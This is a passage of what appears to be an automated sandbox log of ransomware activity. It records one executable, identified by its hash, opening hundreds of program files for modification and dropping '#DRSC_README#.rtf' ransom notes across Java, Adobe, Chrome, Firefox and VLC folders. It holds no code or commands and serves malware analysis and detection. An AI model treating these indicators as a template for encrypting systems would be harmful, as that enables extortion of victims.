modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sk_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-awt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\cacerts 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\editvideoimage.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lv_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\native2ascii.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javaws.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_it.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-1x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_de_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Stamp.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fi.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\zipfs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-down_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sv_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\iw_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\id.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\policytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\TracePing.potm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jawt_md.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\index.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforcomments.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javaw.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\version.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jp2launcher.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\createpdf.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.password.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files 